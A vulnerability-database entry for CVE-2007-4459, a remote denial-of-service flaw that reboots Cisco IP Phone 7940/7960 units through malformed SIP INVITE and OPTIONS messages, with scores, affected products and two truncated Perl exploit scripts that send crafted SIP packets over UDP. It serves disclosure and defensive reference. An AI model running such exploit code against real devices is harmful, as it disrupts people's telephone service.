CVE-2007-4459

Published: 21/08/2007 | Updated: 29/07/2017
CVSS v2 Base Score: 7.1 | Impact Score: 6.9 | Exploitability Score: 8.6
VMScore: 720
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C

Vulnerability Summary

Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware prior to 8.7(0), allow remote malicious users to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.

Vulnerable Product

cisco voip phone cp-7960

cisco voip phone cp-7940 8.6

cisco voip phone cp-7940

cisco voip phone cp-7940 3.0

cisco voip phone cp-7940 3.1

cisco voip phone cp-7940 3.2

Exploits

#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP\t19216812;rport;branch=00\r\nFrom: < ...

#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP $A ...